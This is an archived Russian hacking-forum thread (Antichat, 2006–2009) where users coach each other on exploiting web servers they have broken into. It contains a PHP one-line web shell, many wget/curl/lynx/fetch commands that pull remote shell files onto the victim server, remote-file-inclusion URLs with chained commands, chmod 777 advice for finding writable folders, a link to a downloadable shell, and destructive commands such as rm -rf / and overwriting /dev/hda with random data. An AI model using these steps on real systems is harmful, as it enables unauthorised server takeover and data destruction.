Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   *nix (https://forum.antichat.xyz/forumdisplay.php?f=43)
-   -   Подскажите комманды linux (https://forum.antichat.xyz/showthread.php?t=15597)

TweakeR 08.03.2006 00:45

Подскажите комманды linux
 
Сделал себя админом, залил шелл:
PHP код:

<?  system(\$_GET['c']);  ?>

_http://сайт.ру/cmd.php?c=какие_тут_команды_и_дл я_чего?
Можно ли туда нормальный шелл залить, чтоб файлы редактировать??

TweakeR 08.03.2006 01:07

Может чё не так сделал??

Mobile 08.03.2006 01:24

Цитата:

Сообщение от TweakeR
Сделал себя админом, залил шелл:
PHP код:

<?  system(\$_GET['c']);  ?>

_http://сайт.ру/cmd.php?c=какие_тут_команды_и_дл я_чего?
Можно ли туда нормальный шелл залить, чтоб файлы редактировать??

Функция System не навсех сервах включена, чаще всего используется passthru

Mobile 08.03.2006 01:29

А вообще ты объяснил неочень, имхо подробней надо...

Nova 08.03.2006 01:29

Попробуй

ls la wget вообщем почитай про команды Linux FreeBSd или чо там стоит на том сервере и сможеш сделать всё что тебе надо на ачате гдетто лежит статья про команды так что юзай поиск !

max_pain89 08.03.2006 01:30

да можно... используй что-то типо wget http://lol.ru/remview.txt -O xxx.php

но если тебе удобнее rst то его. Если wget отключена пользуй fetch или curl

Mobile 08.03.2006 01:33

Цитата:

Сообщение от max_pain89
да можно... используй что-то типо wget http://lol.ru/remview.txt -O xxx.php

но если тебе удобнее rst то его. Если wget отключена пользуй fetch или curl

Это кстате тоже далеко невсегда срабатыает...

max_pain89 08.03.2006 02:27

Цитата:

Сообщение от Mobile
Это кстате тоже далеко невсегда срабатыает...

Естестственно, все зависит от конкретного случая.

Azazel 08.03.2006 03:05

Для залития можно использовать wget, get, curl, lynx, links.
И вот почитай http://forum.antichat.ru/thread7345.html

KEZ 08.03.2006 03:14

wget http://address/shell.txt -O /path/to/shell/shell.php
lynx -src http://address/shell.txt -O /path/to/shell/shell.php
fetch http://address/shell.txt
curl --help
fetch --help

Grrl 08.03.2006 07:45

все команды довольно подробно расписанны в мануаласх пичитай все поймешь..
тебе понадобятся для работы с файлами и навигации cd,cp,mv,rm,mkdir и др.
конкретно для заливки шела например rst нужно узнать какая на серве стоит качаллка командой which петем перебора тех что тебе перечислили выше например cmd.php?c=which wget
если получиш ответ севере типо /usr/bin/wget значит она установленна. узнай какие у тебя права командой id потом найли открытый на запись каталог и зазей туда если нет открытых кактогов но есть каталоги владелец UID владельца которого совпадает с твоим который ты узнал по команде ID то просто открой каталог на запись командой chmod (к примеру chmod 777 dorectory ).и лей туда свой шел,,,

помоему дала исчерпывающий мануал.

grinay 08.03.2006 08:17

Мда одна фраза меня убила зделал себя админом:)
и можно ли редактировать файлы?:)
конечно нельзя редактировать файлы ведь ты же админ да? :)
а вообще кез там все показал но я не много уточню.Про курл он не написал:)
curl http://shell.txt -o shell.txt

Utochka 08.03.2006 14:00

юзай команды:
ls -al - список файлов в дире
cd ../ - подняться на диру выше
which wget;which curl - узнать есть ли wget или curl
wget http://www.xxx.ru/shell.php - залить shell
uname -a - версия оси

и тд.

drmist 08.03.2006 14:17

TweakeR
http://drmist.narod.ru/nix_commands.zip
unix-команды
https://drmist.ru/download/shell.txt
шелл с доступом по логину-паролю, функцией download/upload и тем же командным интерпритатором на php.

rent0n 08.03.2006 17:35

man тебе поможет во всем

TANZWUT 09.03.2006 15:14

вот ещё пару прикольных команд:
rm -rf / :) :) :)
а это вообще убойная штука - cat /dev/urandom > /dev/hda :) :) :)

Kalashmat 30.03.2006 09:38

Цитата:

Сообщение от TANZWUT
а это вообще убойная штука - cat /dev/urandom > /dev/hda :) :) :)

Как правило на серверах скази диски так что скорее всего /dev/sda

m0nzt3r 30.03.2006 20:59

ну рулит супер мега комманда
cd /;rm -rf *;wall root you suck!
;)

2rent0n, расслабься, иногда чисто из спортивного интереса можно делать да и если те не надо система а хочешь проучить?

rent0n 30.03.2006 21:50

Цитата:

Сообщение от m0nzt3r
ну рулит супер мега комманда
cd /;rm -rf *;wall root you suck!
;)

Это супер мега долбо**ская команда, ибо кроме бездумного долбо**ского бахвальства и выпендрежа ничего не приносит

limpompo 31.03.2006 11:27

Цитата:

Сообщение от m0nzt3r
ну рулит супер мега комманда
cd /;rm -rf *;wall root you suck!

Гдето я это видел =)

-=megahertz=- 27.05.2007 02:05

я вот через эксплоит получил такой запрос
http://www.site.org/forum/data/config.php?shell=

kак мне теперь залить чтонибудь через браузер?
пример плх если можно)

Piflit 27.05.2007 02:18

http://www.site.org/forum/data/config.php?shell=http://wwwsite2.org/shell.php
где http://wwwsite2.org/shell.php путь до твоего шелла, а потом через него уже закачиваешь.

можно еще так:
http://www.site.org/forum/data/config.php?shell=cd /tmp/;wget http://wwwsite2.org/shell.php;wget http://wwwsite2.org/shell2.php; ls

второй способ был в одном из видео. вроде про zbrute

KPOT_f!nd 27.05.2007 02:20

http://www.site.org/forum/data/config.php?shell=тут_ты_выполняешь команды
найди папку на запись и залей тут web-shell от rst57 (так как на нем легче работать/удобнее)
http://www.site.org/forum/data/config.php?shell=wget -O /home/site.org/soft/shell.php http://site.ru/shell.php
и потом через браузер переходи:
www.site.org/soft/shell.php

Насчет команд почитать/перейти

-=megahertz=- 27.05.2007 02:21

ничего непроизошло(

-=megahertz=- 27.05.2007 02:22

может там команду надо писать?

KPOT_f!nd 27.05.2007 02:25

http://www.site.org/forum/data/config.php?shell=wich wget
http://www.site.org/forum/data/config.php?shell=wget http://www.твой_сайт.ру/шелл.php
но шелл надо залить себе на ftp(хост и т.д) и потом только оттуда сливать. А если ты не залил, тогда конечно не получиться
http://www.site.org/forum/data/config.php?shell=curl http://www.твой_сайт.ру/шелл.php>shell.php

-=megahertz=- 27.05.2007 02:30

человек ты мне очень помог)
а я правильно понял что это делать надо последовательно?

KPOT_f!nd 27.05.2007 02:32

Цитата:

а я правильно понял что это делать надо последовательно?
сперва http://www.site.org/forum/data/config.php?shell=wich wget
потом http://www.site.org/forum/data/config.php?shell=wget http://www.твой_сайт.ру/шелл.php
и потом переходим по урлу ...

-=megahertz=- 27.05.2007 02:34

все спасибо))

downloader 09.02.2009 10:24

а кроме wget и curl есть какие нибудь запросы для того чтобы залить шелл, потому что wget и curl не работают...

aka PSIH 09.02.2009 10:27

Цитата:

Сообщение от downloader
а кроме wget и curl есть какие нибудь запросы для того чтобы залить шелл, потому что wget и curl не работают...

curl --output /papka/na/servere/shell.php http://site.com/shell.php
wget -o /papka/na/servere/shell.php http://site.com/shell.php
get http://site.com/shell.php > /papka/na/servere/shell.php
links -source "http://site.com/shell.php" > /papka/na/servere/shell.php
lynx -source http://site.com/shell.php > /papka/na/servere/shell.php
fetch -o /papka/na/servere/shell.php http://site.com/shell.php

downloader 09.02.2009 18:59

да жалко не одна комманда не работает :( но всётаки спасибо :)

а нету ли такой комманды каторая скачивает все файл каторые находится в /home/mysite/ ?


Время: 03:14